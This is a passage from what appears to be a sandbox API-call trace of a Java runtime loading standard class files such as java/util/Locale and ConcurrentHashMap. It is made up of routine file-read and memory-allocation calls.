liDistanceToMove=0x3160d8a, lpNewFilePointer=0x208bd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd30*=51776906) returned 1 [0098.135] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1bb, lpNumberOfBytesRead=0x208bd00, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bd00*=0x1bb, lpOverlapped=0x0) returned 1 [0098.136] free (_Block=0x121d7d30) [0098.136] free (_Block=0x121d93f0) [0098.138] strlen (_Str="java/nio/charset/CoderResult$Cache.class") returned 0x28 [0098.138] malloc (_Size=0x48) returned 0x121d9a80 [0098.138] malloc (_Size=0xa0) returned 0x1221de70 [0098.139] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a88a, lpNewFilePointer=0x208b690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b690*=54634634) returned 1 [0098.139] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b660, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208b660*=0xa0, lpOverlapped=0x0) returned 1 [0098.139] malloc (_Size=0x29) returned 0x121daab0 [0098.139] free (_Block=0x1221de70) [0098.139] strlen (_Str="java/nio/charset/CoderResult$Cache.class") returned 0x28 [0098.139] strcpy (in: _Dest=0x208b810, _Source="java/nio/charset/CoderResult$Cache.class" | out: _Dest="java/nio/charset/CoderResult$Cache.class") returned="java/nio/charset/CoderResult$Cache.class" [0098.140] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31607f9, lpNewFilePointer=0x208b290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b290*=51775481) returned 1 [0098.140] ReadFile (in: hFile=0x134, lpBuffer=0x208b2e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b260, lpOverlapped=0x0 | out: lpBuffer=0x208b2e0*, lpNumberOfBytesRead=0x208b260*=0x1e, lpOverlapped=0x0) returned 1 [0098.140] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316083f, lpNewFilePointer=0x208b2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2f0*=51775551) returned 1 [0098.140] ReadFile (in: hFile=0x134, lpBuffer=0x2102b90, nNumberOfBytesToRead=0x509, lpNumberOfBytesRead=0x208b2c0, lpOverlapped=0x0 | out: lpBuffer=0x2102b90*, lpNumberOfBytesRead=0x208b2c0*=0x509, lpOverlapped=0x0) returned 1 [0098.140] free (_Block=0x121d80c0) [0098.141] free (_Block=0x121d9080) [0098.149] strlen (_Str="java/nio/charset/CoderResult$2.class") returned 0x24 [0098.149] malloc (_Size=0x48) returned 0x121d9a30 [0098.149] malloc (_Size=0xa0) returned 0x1221de70 [0098.149] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a838, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=54634552) returned 1 [0098.149] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c0a0*=0xa0, lpOverlapped=0x0) returned 1 [0098.149] malloc (_Size=0x25) returned 0x121d7e80 [0098.150] free (_Block=0x1221de70) [0098.150] strlen (_Str="java/nio/charset/CoderResult$2.class") returned 0x24 [0098.150] strcpy (in: _Dest=0x208c250, _Source="java/nio/charset/CoderResult$2.class" | out: _Dest="java/nio/charset/CoderResult$2.class") returned="java/nio/charset/CoderResult$2.class" [0098.150] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31605d0, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=51774928) returned 1 [0098.150] ReadFile (in: hFile=0x134, lpBuffer=0x208bd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x208bd20*, lpNumberOfBytesRead=0x208bca0*=0x1e, lpOverlapped=0x0) returned 1 [0098.150] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3160612, lpNewFilePointer=0x208bd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd30*=51774994) returned 1 [0098.150] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1e7, lpNumberOfBytesRead=0x208bd00, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bd00*=0x1e7, lpOverlapped=0x0) returned 1 [0098.151] free (_Block=0x121daab0) [0098.152] free (_Block=0x121d9a80) [0098.164] ReadFile (in: hFile=0x210, lpBuffer=0x208ba00, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b9d0, lpOverlapped=0x0 | out: lpBuffer=0x208ba00*, lpNumberOfBytesRead=0x208b9d0*=0x5b5, lpOverlapped=0x0) returned 1 [0098.249] GetFileType (hFile=0x210) returned 0x1 [0098.249] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x208dae0, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208dae0*=1461) returned 1 [0098.249] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x208daf0 | out: lpFileSize=0x208daf0*=1461) returned 1 [0098.256] strlen (_Str="java/lang/reflect/Array.class") returned 0x1d [0098.256] malloc (_Size=0x48) returned 0x121d9990 [0098.256] malloc (_Size=0xa0) returned 0x1221de70 [0098.256] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a7ed, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54634477) returned 1 [0098.256] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0098.256] malloc (_Size=0x1e) returned 0x121d7af0 [0098.256] free (_Block=0x1221de70) [0098.257] strlen (_Str="java/lang/reflect/Array.class") returned 0x1d [0098.257] strcpy (in: _Dest=0x208cc30, _Source="java/lang/reflect/Array.class" | out: _Dest="java/lang/reflect/Array.class") returned="java/lang/reflect/Array.class" [0098.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x315feaa, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=51773098) returned 1 [0098.257] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0098.332] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x315fee5, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=51773157) returned 1 [0098.332] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x6eb, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c6e0*=0x6eb, lpOverlapped=0x0) returned 1 [0098.333] free (_Block=0x121d7e80) [0098.333] free (_Block=0x121d9a30) [0098.342] malloc (_Size=0x48) returned 0x121d91c0 [0098.342] malloc (_Size=0xa0) returned 0x1221de70 [0098.342] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a7a9, lpNewFilePointer=0x208cbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbf0*=54634409) returned 1 [0098.342] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cbc0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208cbc0*=0xa0, lpOverlapped=0x0) returned 1 [0098.342] malloc (_Size=0x17) returned 0x1221b3c0 [0098.342] strlen (_Str="java/util/Locale.class") returned 0x16 [0098.343] strcpy (in: _Dest=0x208cd70, _Source="java/util/Locale.class" | out: _Dest="java/util/Locale.class") returned="java/util/Locale.class" [0098.343] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x315a82f, lpNewFilePointer=0x208c7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7f0*=51750959) returned 1 [0098.343] ReadFile (in: hFile=0x134, lpBuffer=0x208c840, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c7c0, lpOverlapped=0x0 | out: lpBuffer=0x208c840*, lpNumberOfBytesRead=0x208c7c0*=0x1e, lpOverlapped=0x0) returned 1 [0098.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x315a863, lpNewFilePointer=0x208c850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c850*=51751011) returned 1 [0098.423] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x5647, lpNumberOfBytesRead=0x208c820, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c820*=0x5647, lpOverlapped=0x0) returned 1 [0098.505] free (_Block=0x121d7af0) [0098.506] free (_Block=0x121d9990) [0098.529] malloc (_Size=0x48) returned 0x121d8fe0 [0098.529] malloc (_Size=0xa0) returned 0x1221de70 [0098.529] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a75f, lpNewFilePointer=0x208c410, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c410*=54634335) returned 1 [0098.529] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c3e0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c3e0*=0xa0, lpOverlapped=0x0) returned 1 [0098.529] malloc (_Size=0x1d) returned 0x121d7a30 [0098.530] free (_Block=0x1221de70) [0098.530] strlen (_Str="java/util/Locale$Cache.class") returned 0x1c [0098.530] strcpy (in: _Dest=0x208c590, _Source="java/util/Locale$Cache.class" | out: _Dest="java/util/Locale$Cache.class") returned="java/util/Locale$Cache.class" [0098.530] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x315a44f, lpNewFilePointer=0x208c010, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c010*=51749967) returned 1 [0098.530] ReadFile (in: hFile=0x134, lpBuffer=0x208c060, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bfe0, lpOverlapped=0x0 | out: lpBuffer=0x208c060*, lpNumberOfBytesRead=0x208bfe0*=0x1e, lpOverlapped=0x0) returned 1 [0098.530] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x315a489, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=51750025) returned 1 [0098.530] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3a6, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c040*=0x3a6, lpOverlapped=0x0) returned 1 [0098.531] free (_Block=0x1221b3c0) [0098.531] free (_Block=0x121d91c0) [0098.534] strlen (_Str="sun/util/locale/LocaleObjectCache.class") returned 0x27 [0098.534] malloc (_Size=0x48) returned 0x121d9800 [0098.534] malloc (_Size=0xa0) returned 0x1221de70 [0098.534] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a70a, lpNewFilePointer=0x208b9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9d0*=54634250) returned 1 [0098.534] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b9a0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208b9a0*=0xa0, lpOverlapped=0x0) returned 1 [0098.534] malloc (_Size=0x28) returned 0x121d80c0 [0098.534] free (_Block=0x1221de70) [0098.534] strlen (_Str="sun/util/locale/LocaleObjectCache.class") returned 0x27 [0098.535] strcpy (in: _Dest=0x208bb50, _Source="sun/util/locale/LocaleObjectCache.class" | out: _Dest="sun/util/locale/LocaleObjectCache.class") returned="sun/util/locale/LocaleObjectCache.class" [0098.535] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3159d52, lpNewFilePointer=0x208b5d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5d0*=51748178) returned 1 [0098.535] ReadFile (in: hFile=0x134, lpBuffer=0x208b620, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b5a0, lpOverlapped=0x0 | out: lpBuffer=0x208b620*, lpNumberOfBytesRead=0x208b5a0*=0x1e, lpOverlapped=0x0) returned 1 [0098.607] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3159d97, lpNewFilePointer=0x208b630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b630*=51748247) returned 1 [0098.607] ReadFile (in: hFile=0x134, lpBuffer=0x2102fa0, nNumberOfBytesToRead=0x6b8, lpNumberOfBytesRead=0x208b600, lpOverlapped=0x0 | out: lpBuffer=0x2102fa0*, lpNumberOfBytesRead=0x208b600*=0x6b8, lpOverlapped=0x0) returned 1 [0098.608] free (_Block=0x121d7a30) [0098.608] free (_Block=0x121d8fe0) [0098.621] strlen (_Str="java/util/concurrent/ConcurrentHashMap.class") returned 0x2c [0098.621] malloc (_Size=0x48) returned 0x121d9710 [0098.621] malloc (_Size=0xa0) returned 0x1221de70 [0098.621] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a6b0, lpNewFilePointer=0x208c280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c280*=54634160) returned 1 [0098.621] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c250, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c250*=0xa0, lpOverlapped=0x0) returned 1 [0098.621] malloc (_Size=0x2d) returned 0x121d9f30 [0098.622] free (_Block=0x1221de70) [0098.622] strlen (_Str="java/util/concurrent/ConcurrentHashMap.class") returned 0x2c [0098.622] strcpy (in: _Dest=0x208c400, _Source="java/util/concurrent/ConcurrentHashMap.class" | out: _Dest="java/util/concurrent/ConcurrentHashMap.class") returned="java/util/concurrent/ConcurrentHashMap.class" [0098.622] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314f33f, lpNewFilePointer=0x208be80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be80*=51704639) returned 1 [0098.622] ReadFile (in: hFile=0x134, lpBuffer=0x208bed0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be50, lpOverlapped=0x0 | out: lpBuffer=0x208bed0*, lpNumberOfBytesRead=0x208be50*=0x1e, lpOverlapped=0x0) returned 1 [0098.712] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314f389, lpNewFilePointer=0x208bee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bee0*=51704713) returned 1 [0098.712] ReadFile (in: hFile=0x134, lpBuffer=0x1221de80, nNumberOfBytesToRead=0xa9c9, lpNumberOfBytesRead=0x208beb0, lpOverlapped=0x0 | out: lpBuffer=0x1221de80*, lpNumberOfBytesRead=0x208beb0*=0xa9c9, lpOverlapped=0x0) returned 1 [0098.783] free (_Block=0x121d80c0) [0098.783] free (_Block=0x121d9800) [0098.790] strlen (_Str="java/util/concurrent/ConcurrentMap.class") returned 0x28 [0098.790] malloc (_Size=0x48) returned 0x121d9c60 [0098.791] malloc (_Size=0xa0) returned 0x12228860 [0098.791] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a65a, lpNewFilePointer=0x208b7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7c0*=54634074) returned 1 [0098.791] ReadFile (in: hFile=0x134, lpBuffer=0x12228860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b790, lpOverlapped=0x0 | out: lpBuffer=0x12228860*, lpNumberOfBytesRead=0x208b790*=0xa0, lpOverlapped=0x0) returned 1 [0098.791] malloc (_Size=0x29) returned 0x121da370 [0098.791] free (_Block=0x12228860) [0098.792] strlen (_Str="java/util/concurrent/ConcurrentMap.class") returned 0x28 [0098.792] strcpy (in: _Dest=0x208b940, _Source="java/util/concurrent/ConcurrentMap.class" | out: _Dest="java/util/concurrent/ConcurrentMap.class") returned="java/util/concurrent/ConcurrentMap.class" [0098.792] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314e553, lpNewFilePointer=0x208b3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3c0*=51701075) returned 1 [0098.792] ReadFile (in: hFile=0x134, lpBuffer=0x208b410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b390, lpOverlapped=0x0 | out: lpBuffer=0x208b410*, lpNumberOfBytesRead=0x208b390*=0x1e, lpOverlapped=0x0) returned 1 [0098.857] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314e599, lpNewFilePointer=0x208b420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b420*=51701145) returned 1 [0098.857] ReadFile (in: hFile=0x134, lpBuffer=0x2102bf0, nNumberOfBytesToRead=0xda6, lpNumberOfBytesRead=0x208b3f0, lpOverlapped=0x0 | out: lpBuffer=0x2102bf0*, lpNumberOfBytesRead=0x208b3f0*=0xda6, lpOverlapped=0x0) returned 1 [0098.857] free (_Block=0x121d9f30) [0098.858] free (_Block=0x121d9710) [0098.880] malloc (_Size=0x48) returned 0x121d90d0 [0098.880] malloc (_Size=0xa0) returned 0x122291c0 [0098.880] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a5f8, lpNewFilePointer=0x208bbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbf0*=54633976) returned 1 [0098.880] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bbc0, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208bbc0*=0xa0, lpOverlapped=0x0) returned 1 [0098.880] malloc (_Size=0x35) returned 0x121daab0 [0098.880] free (_Block=0x122291c0) [0098.881] strlen (_Str="java/util/concurrent/ConcurrentHashMap$Segment.class") returned 0x34 [0098.881] strcpy (in: _Dest=0x208bd70, _Source="java/util/concurrent/ConcurrentHashMap$Segment.class" | out: _Dest="java/util/concurrent/ConcurrentHashMap$Segment.class") returned="java/util/concurrent/ConcurrentHashMap$Segment.class" [0098.881] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314e2e7, lpNewFilePointer=0x208b7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7f0*=51700455) returned 1 [0098.881] ReadFile (in: hFile=0x134, lpBuffer=0x208b840, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b7c0, lpOverlapped=0x0 | out: lpBuffer=0x208b840*, lpNumberOfBytesRead=0x208b7c0*=0x1e, lpOverlapped=0x0) returned 1 [0098.881] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314e339, lpNewFilePointer=0x208b850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b850*=51700537) returned 1 [0098.881] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9c0, nNumberOfBytesToRead=0x21a, lpNumberOfBytesRead=0x208b820, lpOverlapped=0x0 | out: lpBuffer=0x20fe9c0*, lpNumberOfBytesRead=0x208b820*=0x21a, lpOverlapped=0x0) returned 1 [0098.881] free (_Block=0x121da370) [0098.881] free (_Block=0x121d9c60) [0098.883] strlen (_Str="java/util/concurrent/locks/ReentrantLock.class") returned 0x2e [0098.883] malloc (_Size=0x48) returned 0x121d9b70 [0098.883] malloc (_Size=0xa0) returned 0x122291c0 [0098.883] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a59c, lpNewFilePointer=0x208b1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1b0*=54633884) returned 1 [0098.883] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b180, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208b180*=0xa0, lpOverlapped=0x0) returned 1 [0098.883] malloc (_Size=0x2f) returned 0x121da370 [0098.883] free (_Block=0x122291c0) [0098.884] strlen (_Str="java/util/concurrent/locks/ReentrantLock.class") returned 0x2e [0098.884] strcpy (in: _Dest=0x208b330, _Source="java/util/concurrent/locks/ReentrantLock.class" | out: _Dest="java/util/concurrent/locks/ReentrantLock.class") returned="java/util/concurrent/locks/ReentrantLock.class" [0098.884] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314d444, lpNewFilePointer=0x208adb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208adb0*=51696708) returned 1 [0098.884] ReadFile (in: hFile=0x134, lpBuffer=0x208ae00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ad80, lpOverlapped=0x0 | out: lpBuffer=0x208ae00*, lpNumberOfBytesRead=0x208ad80*=0x1e, lpOverlapped=0x0) returned 1 [0098.957] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314d490, lpNewFilePointer=0x208ae10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae10*=51696784) returned 1 [0098.957] ReadFile (in: hFile=0x134, lpBuffer=0x2102bf0, nNumberOfBytesToRead=0xe57, lpNumberOfBytesRead=0x208ade0, lpOverlapped=0x0 | out: lpBuffer=0x2102bf0*, lpNumberOfBytesRead=0x208ade0*=0xe57, lpOverlapped=0x0) returned 1 [0098.958] free (_Block=0x121daab0) [0098.958] free (_Block=0x121d90d0) [0098.962] strlen (_Str="java/util/concurrent/locks/Lock.class") returned 0x25 [0098.962] malloc (_Size=0x48) returned 0x121d9210 [0098.962] malloc (_Size=0xa0) returned 0x122291c0 [0098.962] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a549, lpNewFilePointer=0x208a6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a6f0*=54633801) returned 1 [0098.962] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a6c0, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208a6c0*=0xa0, lpOverlapped=0x0) returned 1 [0098.962] malloc (_Size=0x26) returned 0x121d7e80 [0098.963] free (_Block=0x122291c0) [0098.963] strlen (_Str="java/util/concurrent/locks/Lock.class") returned 0x25 [0098.963] strcpy (in: _Dest=0x208a870, _Source="java/util/concurrent/locks/Lock.class" | out: _Dest="java/util/concurrent/locks/Lock.class") returned="java/util/concurrent/locks/Lock.class" [0098.963] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314d29f, lpNewFilePointer=0x208a2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a2f0*=51696287) returned 1 [0098.963] ReadFile (in: hFile=0x134, lpBuffer=0x208a340, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a2c0, lpOverlapped=0x0 | out: lpBuffer=0x208a340*, lpNumberOfBytesRead=0x208a2c0*=0x1e, lpOverlapped=0x0) returned 1 [0098.963] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314d2e2, lpNewFilePointer=0x208a350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a350*=51696354) returned 1 [0098.963] ReadFile (in: hFile=0x134, lpBuffer=0x2103bf0, nNumberOfBytesToRead=0x162, lpNumberOfBytesRead=0x208a320, lpOverlapped=0x0 | out: lpBuffer=0x2103bf0*, lpNumberOfBytesRead=0x208a320*=0x162, lpOverlapped=0x0) returned 1 [0098.963] free (_Block=0x121da370) [0098.964] free (_Block=0x121d9b70) [0098.983] strlen (_Str="java/util/concurrent/ConcurrentHashMap$Node.class") returned 0x31 [0098.983] malloc (_Size=0x48) returned 0x121d9da0 [0098.984] malloc (_Size=0xa0) returned 0x122291c0 [0098.984] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a4ea, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54633706) returned 1 [0098.984] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0098.984] malloc (_Size=0x32) returned 0x121daab0 [0098.984] free (_Block=0x122291c0) [0098.984] strlen (_Str="java/util/concurrent/ConcurrentHashMap$Node.class") returned 0x31 [0098.985] strcpy (in: _Dest=0x208c1f0, _Source="java/util/concurrent/ConcurrentHashMap$Node.class" | out: _Dest="java/util/concurrent/ConcurrentHashMap$Node.class") returned="java/util/concurrent/ConcurrentHashMap$Node.class" [0098.985] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314ca79, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=51694201) returned 1 [0098.985] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0099.023] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314cac8, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=51694280) returned 1 [0099.023] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x7d7, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208bca0*=0x7d7, lpOverlapped=0x0) returned 1 [0099.024] free (_Block=0x121d7e80) [0099.024] free (_Block=0x121d9210) [0099.029] malloc (_Size=0x48) returned 0x121d9ad0 [0099.029] malloc (_Size=0xa0) returned 0x122291c0 [0099.029] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a484, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54633604) returned 1 [0099.029] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0099.029] malloc (_Size=0x39) returned 0x121d95d0 [0099.029] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314c8bc, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=51693756) returned 1 [0099.029] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0099.029] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314c912, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=51693842) returned 1 [0099.029] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9e0, nNumberOfBytesToRead=0x167, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9e0*, lpNumberOfBytesRead=0x208bca0*=0x167, lpOverlapped=0x0) returned 1 [0099.030] malloc (_Size=0x48) returned 0x121d9580 [0099.030] malloc (_Size=0xa0) returned 0x122291c0 [0099.030] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a41f, lpNewFilePointer=0x208c0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0b0*=54633503) returned 1 [0099.030] ReadFile (in: hFile=0x134, lpBuffer=0x122291c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c080, lpOverlapped=0x0 | out: lpBuffer=0x122291c0*, lpNumberOfBytesRead=0x208c080*=0xa0, lpOverlapped=0x0) returned 1 [0099.030] malloc (_Size=0x38) returned 0x121d9f30 [0099.030] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314ba98, lpNewFilePointer=0x208bcb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcb0*=51690136) returned 1 [0099.031] ReadFile (in: hFile=0x134, lpBuffer=0x208bd00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc80, lpOverlapped=0x0 | out: lpBuffer=0x208bd00*, lpNumberOfBytesRead=0x208bc80*=0x1e, lpOverlapped=0x0) returned 1 [0099.072] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x314baed, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=51690221) returned 1 [0099.072] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xdcf, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208bce0*=0xdcf, lpOverlapped=0x0) returned 1 [0099.073] malloc 